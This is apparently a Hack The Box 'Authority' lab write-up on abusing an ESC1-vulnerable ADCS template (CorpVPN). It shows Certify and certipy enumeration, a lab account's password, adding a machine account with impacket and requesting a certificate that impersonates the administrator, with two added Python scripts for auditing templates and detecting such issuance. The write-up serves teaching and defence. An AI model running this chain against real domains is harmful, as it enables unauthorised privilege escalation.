ADCS
Active Directory Certificate Services (AD CS) is a Windows Server role for issuing and managing public key infrastructure (PKI) certificates used in secure communication and authentication protocols.
AD CS provides the following important features:
- Certification Authorities: Root and subordinate Certificate Authorities (CAs) are used to issue certificates to users, computers, and services, and to manage certificate validity.
- Web Enrollment: Web enrollment allows users to connect to a CA with a web browser in order to request certificates and retrieve certificate revocation lists (CRLs).
- Online Responder: The Online Responder service decodes revocation status requests for specific certificates, evaluates the status of these certificates, and sends back a signed response containing the requested certificate status information.
- Network Device Enrollment Service: The Network Device Enrollment Service allows routers and other network devices that don't have domain accounts to obtain certificates.
- TPM Key Attestation: Lets the certification authority verify that the private key is protected by a hardware-based TPM and that the TPM is one the CA trusts. TPM key attestation prevents the certificate from being exported to an unauthorized device and can bind the user identity to the device.
- Certificate Enrollment Policy Web Service: The Certificate Enrollment Policy Web Service enables users and computers to obtain certificate enrollment policy information.
- Certificate Enrollment Web Service: The Certificate Enrollment Web Service enables users and computers to perform certificate enrollment through a web service. Together with the Certificate Enrollment Policy Web Service, this enables policy-based certificate enrollment when the client computer isn't a member of a domain or when a domain member isn't connected to the domain.
The initial suspicion came from the Ansible playbook dedicated to ADCS found in the Development SMB share. At a later stage, I saw the certsrv process, which is mostly associated with the Certificate Services Web Enrollment role service, part of Active Directory Certificate Services (ADCS).
*Evil-WinRM* PS C:\Users\svc_ldap\Documents> Get-Service -Name "CertSvc"
Status Name DisplayName
------ ---- -----------
Running CertSvc Active Directory Certificate Services
ADCS itself runs as the CertSvc service, which is the service directly responsible for ADCS and runs in the background.
While there are many ways to enumerate ADCS for vulnerabilities, the following two tools dominate:
- Certify.exe: A C# tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).
- certipy: A Python implementation of Certify.exe with support for a custom BloodHound fork
*Evil-WinRM* PS C:\Users\svc_ldap\Documents> ./Certify.exe find /vulnerable /quiet
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=authority,DC=htb'
[*] Listing info about the Enterprise CA 'AUTHORITY-CA'
Enterprise CA Name : AUTHORITY-CA
DNS Hostname : authority.authority.htb
FullName : authority.authority.htb\AUTHORITY-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=AUTHORITY-CA, DC=authority, DC=htb
Cert Thumbprint : 42A80DC79DD9CE76D032080B2F8B172BC29B0182
Cert Serial : 2C4E1F3CA46BBDAF42A1DDE3EC33A6B4
Cert Start Date : 4/23/2023 9:46:26 PM
Cert End Date : 4/23/2123 9:56:25 PM
Cert Chain : CN=AUTHORITY-CA,DC=authority,DC=htb
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated Users S-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates HTB\Domain Admins S-1-5-21-622327497-3269355298-2248959698-512
Allow ManageCA, ManageCertificates HTB\Enterprise Admins S-1-5-21-622327497-3269355298-2248959698-519
Enrollment Agent Restrictions : None
[!] Vulnerable Certificates Templates :
CA Name : authority.authority.htb\AUTHORITY-CA
Template Name : CorpVPN
Schema Version : 2
Validity Period : 20 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT_CHECK_USER_DS_CERTIFICATE
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Document Signing, Encrypting File System, IP security IKE intermediate, IP security user, KDC Authentication, Secure Email
mspki-certificate-application-policy : Client Authentication, Document Signing, Encrypting File System, IP security IKE intermediate, IP security user, KDC Authentication, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : HTB\Domain Admins S-1-5-21-622327497-3269355298-2248959698-512
HTB\Domain Computers S-1-5-21-622327497-3269355298-2248959698-515
HTB\Enterprise Admins S-1-5-21-622327497-3269355298-2248959698-519
Object Control Permissions
Owner : HTB\Administrator S-1-5-21-622327497-3269355298-2248959698-500
WriteOwner Principals : HTB\Administrator S-1-5-21-622327497-3269355298-2248959698-500
HTB\Domain Admins S-1-5-21-622327497-3269355298-2248959698-512
HTB\Enterprise Admins S-1-5-21-622327497-3269355298-2248959698-519
WriteDacl Principals : HTB\Administrator S-1-5-21-622327497-3269355298-2248959698-500
HTB\Domain Admins S-1-5-21-622327497-3269355298-2248959698-512
HTB\Enterprise Admins S-1-5-21-622327497-3269355298-2248959698-519
WriteProperty Principals : HTB\Administrator S-1-5-21-622327497-3269355298-2248959698-500
HTB\Domain Admins S-1-5-21-622327497-3269355298-2248959698-512
HTB\Enterprise Admins S-1-5-21-622327497-3269355298-2248959698-519
Certify.exe found a vulnerable template, CorpVPN, issued by the authority.authority.htb\AUTHORITY-CA CA.
┌──(kali㉿kali)-[~/…/htb/labs/authority/ADCS]
└─$ certipy find -vulnerable -u svc_ldap@authority.htb -p lDaP_1n_th3_cle4r! -dc-ip $IP -stdout
Certipy v4.3.0 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 37 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Trying to get CA configuration for 'AUTHORITY-CA' via CSRA
[!] Got error while trying to get CA configuration for 'AUTHORITY-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'AUTHORITY-CA' via RRP
[*] Got CA configuration for 'AUTHORITY-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : AUTHORITY-CA
DNS Name : authority.authority.htb
Certificate Subject : CN=AUTHORITY-CA, DC=authority, DC=htb
Certificate Serial Number : 2C4E1F3CA46BBDAF42A1DDE3EC33A6B4
Certificate Validity Start : 2023-04-24 01:46:26+00:00
Certificate Validity End : 2123-04-24 01:56:25+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : AUTHORITY.HTB\Administrators
Access Rights
ManageCertificates : AUTHORITY.HTB\Administrators
AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
ManageCa : AUTHORITY.HTB\Administrators
AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
Enroll : AUTHORITY.HTB\Authenticated Users
Certificate Templates
0
Template Name : CorpVPN
Display Name : Corp VPN
Certificate Authorities : AUTHORITY-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : AutoEnrollmentCheckUserDsCertificate
PublishToDs
IncludeSymmetricAlgorithms
Private Key Flag : 16777216
65536
ExportableKey
Extended Key Usage : Encrypting File System
Secure Email
Client Authentication
Document Signing
IP security IKE intermediate
IP security use
KDC Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 20 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : AUTHORITY.HTB\Domain Computers
AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
Object Control Permissions
Owner : AUTHORITY.HTB\Administrator
Write Owner Principals : AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
AUTHORITY.HTB\Administrator
Write Dacl Principals : AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
AUTHORITY.HTB\Administrator
Write Property Principals : AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
AUTHORITY.HTB\Administrator
[!] Vulnerabilities
ESC1 : 'AUTHORITY.HTB\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
certipy also flagged CorpVPN as a vulnerable template for the very same reason, and it also specified the type of vulnerability: ESC1.
The vulnerability is present due to:
- The Enrollment Rights attribute, one of whose values is AUTHORITY.HTB\Domain Computers
  - By default, any domain user is able to add up to 10 machine accounts. This was confirmed earlier.
- The msPKI-Certificate-Name-Flag attribute set to ENROLLEE_SUPPLIES_SUBJECT
  - Meaning that the enrollee (the computer account in this case) is able to choose whom the certificate is issued to.
- The pkiextendedkeyusage attribute has Client Authentication set
  - It indicates that a certificate generated from this vulnerable certificate template can be used to authenticate to computers in Active Directory.
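The three conditions above are exactly what a defender should audit for on every enabled template, not just the one certipy happened to flag. The following is an added example, not code from the original write-up and not part of certipy or Certify: it parses the indented "Key : Value" layout that certipy prints with -stdout (the constructed sample below is a trimmed copy of the CorpVPN block shown above), then applies the ESC1 criteria listed in the bullets, including the ms-DS-MachineAccountQuota point, whose value is passed in as a parameter because the page confirmed it elsewhere rather than in this output.

```python
import re

# Constructed sample: a trimmed copy of the certipy template block shown above,
# keeping certipy's -stdout layout (key : value, indented continuation lines
# for multi-valued fields, section headings without a colon).
SAMPLE = r"""
Certificate Templates
  0
    Template Name                       : CorpVPN
    Display Name                        : Corp VPN
    Enabled                             : True
    Client Authentication               : True
    Enrollee Supplies Subject           : True
    Extended Key Usage                  : Encrypting File System
                                          Secure Email
                                          Client Authentication
    Requires Manager Approval           : False
    Authorized Signatures Required      : 0
    Permissions
      Enrollment Permissions
        Enrollment Rights               : AUTHORITY.HTB\Domain Computers
                                          AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC1                              : 'AUTHORITY.HTB\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
"""

# A key line is "<indent><letters and spaces> : <value>"; section headings have no colon.
KV = re.compile(r"^(\s*)([A-Za-z][A-Za-z ]*?)\s*:\s*(.*)$")

# Built-in administrative principals; anyone else holding Enroll counts as low-privileged.
PRIVILEGED = {"Administrators", "Administrator", "Domain Admins", "Enterprise Admins"}


def parse_templates(text):
    """Return one dict per template; every value is a list (multi-valued fields span lines)."""
    templates, current, last_key, last_indent = [], None, None, 0
    for line in text.splitlines():
        indent = len(line) - len(line.lstrip())
        m = KV.match(line)
        if m:
            key, value = m.group(2).strip(), m.group(3).strip()
            if key == "Template Name":          # each template block starts with its name
                current = {}
                templates.append(current)
            if current is None:                 # CA section or preamble: not a template
                continue
            current[key] = [value] if value else []
            last_key, last_indent = key, indent
        elif current is not None and last_key and line.strip() and indent > last_indent:
            current[last_key].append(line.strip())   # continuation of a multi-valued field
        else:
            last_key = None                     # heading, blank line or unknown line ends the field
    return templates


def _flag(template, key):
    return template.get(key, [""])[0].lower() == "true"


def low_priv_enrollers(template):
    """Principals with Enroll rights that are not built-in admin groups."""
    return [p for p in template.get("Enrollment Rights", [])
            if p.rsplit("\\", 1)[-1] not in PRIVILEGED]


def esc1_findings(template, machine_account_quota=10):
    """Return the ESC1 conditions the template meets; an empty list means it is not ESC1."""
    enrollers = low_priv_enrollers(template)
    client_auth = (_flag(template, "Client Authentication")
                   or "Client Authentication" in template.get("Extended Key Usage", []))
    conditions = [
        (_flag(template, "Enabled"), "template is enabled"),
        (bool(enrollers), "low-privileged principals can enroll: " + ", ".join(enrollers)),
        (_flag(template, "Enrollee Supplies Subject"), "enrollee supplies the subject (ENROLLEE_SUPPLIES_SUBJECT)"),
        (client_auth, "certificate is valid for client authentication"),
        (not _flag(template, "Requires Manager Approval"), "no manager approval required"),
        (template.get("Authorized Signatures Required", ["0"])[0] == "0", "no authorized signatures required"),
    ]
    if not all(ok for ok, _ in conditions):
        return []
    findings = [text for _, text in conditions]
    # Domain Computers enrolling is only low-privileged if ordinary users can create computers.
    if machine_account_quota > 0 and any(p.endswith("Domain Computers") for p in enrollers):
        findings.append(f"Domain Computers can enroll and ms-DS-MachineAccountQuota is "
                        f"{machine_account_quota}, so any domain user can create an enrolling principal")
    return findings


if __name__ == "__main__":
    for t in parse_templates(SAMPLE):
        findings = esc1_findings(t)
        print(f"{t['Template Name'][0]}: {'ESC1' if findings else 'ok'}")
        for f in findings:
            print("  -", f)
```

Run against the full certipy -stdout output, the script lists every template that meets all of the conditions at once. Each finding maps to a fix: removing ENROLLEE_SUPPLIES_SUBJECT (or the Client Authentication EKU) from templates that do not need it, requiring manager approval or an authorized signature, restricting Enroll to the groups that actually need the template, and setting ms-DS-MachineAccountQuota to 0 so Domain Computers stops being a group any user can join.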
Adding a Computer Account
┌──(kali㉿kali)-[~/…/htb/labs/authority/ADCS]
└─$ KRB5CCNAME=../svc_ldap.ccache impacket-addcomputer authority.htb/ -k -no-pass -computer-name esc1 -computer-pass 'qwe123' -dc-host authority.authority.htb -dc-ip $IP
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Successfully added machine account esc1$ with password qwe123.
Using the pass-the-ticket technique with the TGT of the svc_ldap user, I am able to add a computer account (esc1:qwe123) to the target domain via impacket-addcomputer.
*Evil-WinRM* PS C:\Users\svc_ldap\Documents> Get-ADComputer -Filter *
DistinguishedName : CN=AUTHORITY,OU=Domain Controllers,DC=authority,DC=htb
DNSHostName       : authority.authority.htb
Enabled           : True
Name              : AUTHORITY
ObjectClass       : computer
ObjectGUID        : 23c88ddb-c76e-41bd-8b75-dd04e08431cc
SamAccountName    : AUTHORITY$
SID               : S-1-5-21-622327497-3269355298-2248959698-1000
UserPrincipalName :

DistinguishedName : CN=esc1,CN=Computers,DC=authority,DC=htb
DNSHostName       :
Enabled           : True
Name              : esc1
ObjectClass       : computer
ObjectGUID        : ebbd3672-dfdc-4ecc-90dd-4382f1f50a18
SamAccountName    : esc1$
SID               : S-1-5-21-622327497-3269355298-2248959698-11604
UserPrincipalName :
I can confirm that from the existing WinRM session with the Get-ADComputer PowerShell cmdlet.
Requesting Certificate with Impersonation
Now that I have created a valid AD computer object, I should be able to authenticate as the computer account and request a certificate. Since Certify.exe does not natively support requesting a certificate as someone else, I need to use certipy.
┌──(kali㉿kali)-[~/…/htb/labs/authority/ADCS]
└─$ certipy req -u 'esc1$@authority.htb' -p qwe123 -target authority.authority.htb -ca AUTHORITY-CA -template 'CorpVPN' -upn administrator@authority.htb
Certipy v4.3.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 9
[*] Got certificate with UPN 'administrator@authority.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
I can request a certificate as the newly created computer account (esc1$), setting the UPN to impersonate the administrator user, or alternatively with -subject CN=Administrator,CN=Users,DC=AUTHORITY,DC=HTB.
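The request above is what the sequence looks like from the CA's side: a machine account created minutes earlier asks for a CorpVPN certificate carrying the administrator's UPN. The following is an added example, not part of the original write-up, that runs that correlation over constructed records. The record fields (requester, cert_upn, issued) and the computer creation timestamps are assumptions modelled on the output above, not a real Windows event schema; a deployment would populate them from the CA's issuance log and the directory's computer creation events.

```python
from datetime import datetime, timedelta

# Constructed sample data (field names are assumptions, not a Windows event schema):
# when each machine account was created, and which certificates the CA issued.
COMPUTER_CREATED = {
    "esc1$": datetime(2023, 7, 18, 0, 1, 0),
    "authority$": datetime(2023, 4, 23, 21, 40, 0),
}
ISSUED = [
    {"request_id": 8, "requester": "AUTHORITY\\svc_ldap", "template": "User",
     "cert_upn": "svc_ldap@authority.htb", "issued": datetime(2023, 7, 17, 23, 50, 0)},
    {"request_id": 9, "requester": "AUTHORITY\\esc1$", "template": "CorpVPN",
     "cert_upn": "administrator@authority.htb", "issued": datetime(2023, 7, 18, 0, 4, 0)},
]
# Accounts whose UPN appearing in someone else's request is always worth a look.
PRIVILEGED_ACCOUNTS = {"administrator"}


def account_name(principal):
    """'AUTHORITY\\esc1$' -> 'esc1$' (lower-cased)."""
    return principal.rsplit("\\", 1)[-1].lower()


def review_issuance(record, created=COMPUTER_CREATED, max_age=timedelta(days=1)):
    """Return the reasons a single issuance looks like ESC1 abuse (empty list = benign)."""
    reasons = []
    requester = account_name(record["requester"])
    upn_user = record["cert_upn"].split("@", 1)[0].lower()
    # The identity in the certificate should be the identity that asked for it.
    if requester.rstrip("$") != upn_user:
        reasons.append(f"requester {requester} received a certificate for {upn_user}")
    # A machine account that did not exist a day ago is a classic throwaway enroller.
    if (requester.endswith("$") and requester in created
            and record["issued"] - created[requester] <= max_age):
        reasons.append("requesting machine account was created within the last day")
    if upn_user in PRIVILEGED_ACCOUNTS:
        reasons.append("certificate names a privileged account")
    return reasons


def suspicious_issuances(records, created=COMPUTER_CREATED):
    """Map request_id -> reasons for every issuance that triggers at least one check."""
    result = {}
    for record in records:
        reasons = review_issuance(record, created)
        if reasons:
            result[record["request_id"]] = reasons
    return result


if __name__ == "__main__":
    for request_id, reasons in suspicious_issuances(ISSUED).items():
        print(f"request {request_id}:")
        for reason in reasons:
            print("  -", reason)
```

The requester/UPN mismatch check alone would fire on legitimate uses of a template with ENROLLEE_SUPPLIES_SUBJECT (that is what the flag is for), so the creation-age and privileged-account checks are what turn it into a high-confidence alert rather than noise.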
┌──(kali㉿kali)-[~/…/htb/labs/authority/ADCS]
└─$ certipy auth -pfx administrator.pfx -username administrator -domain authority.htb -dc-ip $IP
Certipy v4.3.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@authority.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
Attempting to authenticate using the retrieved certificate file (administrator.pfx) fails.
This usually works, but it didn't here because the target KDC has this particular feature disabled. More details about this error can be checked here.
There is a solution to this, since PFX files are used for storing the server certificate, intermediate certificates, and the private key.
BloodHound with certipy
certipy also supports outputting the result as BloodHound data for GUI review; however, it requires a custom fork of BloodHound.
┌──(kali㉿kali)-[~/…/htb/labs/authority/ADCS]
└─$ certipy find -vulnerable -u svc_ldap@authority.htb -p lDaP_1n_th3_cle4r! -dc-ip $IP -bloodhound
Certipy v4.3.0 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 37 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Trying to get CA configuration for 'AUTHORITY-CA' via CSRA
[!] Got error while trying to get CA configuration for 'AUTHORITY-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'AUTHORITY-CA' via RRP
[*] Got CA configuration for 'AUTHORITY-CA'
[*] Saved BloodHound data to '20230718000444_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
Since this is a custom BloodHound build designed to work with PKI nodes, there is a dedicated section for them in the Analysis tab.